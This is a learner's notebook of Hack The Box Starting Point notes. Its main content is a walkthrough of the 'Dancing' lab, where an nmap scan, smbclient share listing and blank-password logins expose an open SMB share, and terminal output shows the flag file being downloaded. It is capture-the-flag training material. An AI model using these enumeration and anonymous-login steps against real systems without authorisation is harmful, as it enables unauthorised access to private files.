<a href="https://colab.research.google.com/github/dirkpmueller/100-days-of-code-exercises/blob/main/hackthebox.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

##**Hack the box**
- set up VMware
- downloaded and installed Parrot OS Security
- downloaded and run OpenVPN


##**Tier 0 Lab1 - MEOW**


##**Tier 0 Lab2 - FAWN**

- FTP
- Network
- Protocols
- Reconnaissance
- Anonymous/Guest Access


##**T0L3 - Dancing**
- We start, as always, by scanning the target once we are connected to the VPN. Running the following
command will make nmap scan all of the ports and display service versions for each of them.

    `sudo nmap -sV {ip}`

- port 445 TCP for SMB is up and running, which means that we
have an active share that we could potentially explore. Think of this share as a folder that can be accessed
over the internet
- In order to successfully enumerate share content on the remote system, we can use a script called
smbclient . If the script is not present on your Virtual Machine, you can install it by typing the following
command in your terminal (for Debian based operating systems):
    
    `sudo apt-get install smbclient`

- Smbclient will attempt to connect to the remote host and check if there is any authentication required. If
there is, it will ask you for a password for your local username. We should take note of this. If we do not
specify a specific username to smbclient when attempting to connect to the remote host, it will just use your
local machine's username. 

- In this case, we do not have such credentials, so what we will be trying to perform is any of
the following:
  - Guest authentication
  - Anonymous authentication

  Any of these will result in us logging in without knowing a proper username/password combination and
seeing the files stored on the share.

    `smbclient -L {ip}`

    `[-L|--list=HOST] : Selecting the targeted host for the connection request.`

  - `ADMIN$` - Administrative shares are hidden network shares created by the Windows NT family of
operating systems that allow system administrators to have remote access to every disk volume on a
network-connected system. These shares may not be permanently deleted but may be disabled.

  - `C$` - Administrative share for the C:\ disk volume. This is where the operating system is hosted.

  - `IPC$` - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.

  - `WorkShares` - Custom share.

- attempting to log in without the
proper credentials to find improperly configured permissions on any of these shares. We'll just give a blank
password for each username to see if it works.

    ```SMB1 disabled -- no workgroup available
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\ADMIN$
Password for [WORKGROUP\htb-dirkpm]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\C$
Password for [WORKGROUP\htb-dirkpm]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\IPC$
Password for [WORKGROUP\htb-dirkpm]:
Try "help" to get a list of possible commands.
smb: \> EXIT
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\Workshares
Password for [WORKGROUP\htb-dirkpm]:
Try "help" to get a list of possible commands.
smb: \> 
```

- The WorkShares SMB share was poorly configured, allowing us to log in without the appropriate
credentials. We can see our terminal prompt changed to `smb: \>` , letting us know that our shell is now
interacting with the service.

   ```ls : listing contents of the directories within the share
cd : changing current directories within the share
get : downloading the contents of the directories within the share
exit : exiting the smb shell
```

    ```
  smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

		5114111 blocks of size 4096. 1751626 blocks available
    ```

    ```
smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 10:08:24 2021
  ..                                  D        0  Mon Mar 29 10:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 11:00:37 2021

		5114111 blocks of size 4096. 1751610 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    ```

    ```
    smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

		5114111 blocks of size 4096. 1751594 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 09:38:03 2021
  ..                                  D        0  Thu Jun  3 09:38:03 2021
  flag.txt                            A       32  Mon Mar 29 10:26:57 2021

		5114111 blocks of size 4096. 1751594 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
    ```

    ```
    smb: \James.P\> exit
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ ls
Desktop  flag.txt  my_data  Templates  worknotes.txt

    ```